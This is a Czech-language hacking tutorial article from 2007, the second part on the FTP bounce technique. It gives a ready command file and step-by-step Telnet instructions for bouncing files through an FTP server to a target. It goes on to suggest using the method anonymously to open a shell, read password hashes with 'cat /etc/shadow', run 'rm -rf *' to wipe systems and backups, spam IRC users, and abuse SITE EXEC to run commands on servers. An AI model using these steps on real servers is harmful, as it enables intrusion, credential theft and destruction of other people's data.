Zpět na seznam článků     Číst komentáře (4)     Verze pro tisk

FTP Bounce --> 2. část

Autor: Genua_   
9.6.2007

Pokračování jedné z mnoha technik hackingu.


Vytvořme si nyní další příklad trošku více kompletní.

Občas se setkáme s případy, kdy nemůžeme odeslat soubor na server, jelikož není v Česku a nechce nám dovolit ho spustit. Jak pokračovat dále?
Vytvoříme soubor s následujícími příkazy:

user anonymous
pass nikdo@nic.com
cwd /directory/kde/je/soubor
type i
port X,X,X,X,Y,Y
retr jmeno _souboru
quit

(samozřejmě i tento soubor bude využit s debug a copy)
Řekněme, že soubor bude mít jméno bounce.
V souboru budete muset změnit adresář a jméno souboru. X,X,X,X je Vaše IP adresa a Y,Y je vysvětleno trošku níže.
Nyní, co je potřeba udělat:

- Připojte se pomocí Telnet na port 21 vašeho serveru
- Napište PASV (samozřejmě enter)
- Server odpoví něco ve stylu 111.22.33.44,0,21, všimněte si posledních dvou čísel
- Napište STOR hahaha
- Nyní se Telnet zasekne, jelikož bude čekat na soubory pro odeslání
- Použijte vašeho FTP-klienta a odešlete soubor
- Nyní otevřete Telnet, připojte se na váš server na portu 21 a napište PORT x,x,x,x,0,21 (kde x.x.x.x je IP adresa serveru na útok)
- Napište RETR bounce (pokud jste soubor pojmenovali bounce)
- Po určité době, najdete soubor na serveru se jménem hahaha

Existuje mnoho jiných způsobů na využití FTP Bounce, například pokud chcete někomu neustále odesílat zprávy na IRC, můžete vytvořit soubor příkazů, které budou mít příkazy FTP, například DCC CHAT, PRIVMSG, atd. (pouze pokud znáte dobře IRC) a odeslat je z vašeho serveru na jeden z mnoha serverů IRC.
Můžete to také využít pro připojení na shell, číst soubory hesel a to vše bez možnosti zjistit, kdo jste. Například můžete využít příkazu cat /etc/shadow pro ukázání souboru hesel shadow, nebo rm -rf * (pro unavení SysAdmin a omezení dělat backup jejich systémů).
Stojí ještě za to napsat pár maličkostí o bugech FTP.
SITE EXEC je příkaz, který se najde na mnoha serverech, jak Unix, tak i Windows. Není to bug, ale je to příkaz, který se dá tak trochu využít. Na co se dá využít? Při použití Telnet na portu 21 serveru FTP, odešlete příkazy USER a PASS, aby bylo možno se připojit jako anonym. Následujte příkazem SITE EXEC, pokud je příkaz implementován, tak se spustí.
Proto, abyste věděli, co jsou za příkazy možné, tak můžete využít příkazu HELP, který vám všechny vypíše.

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)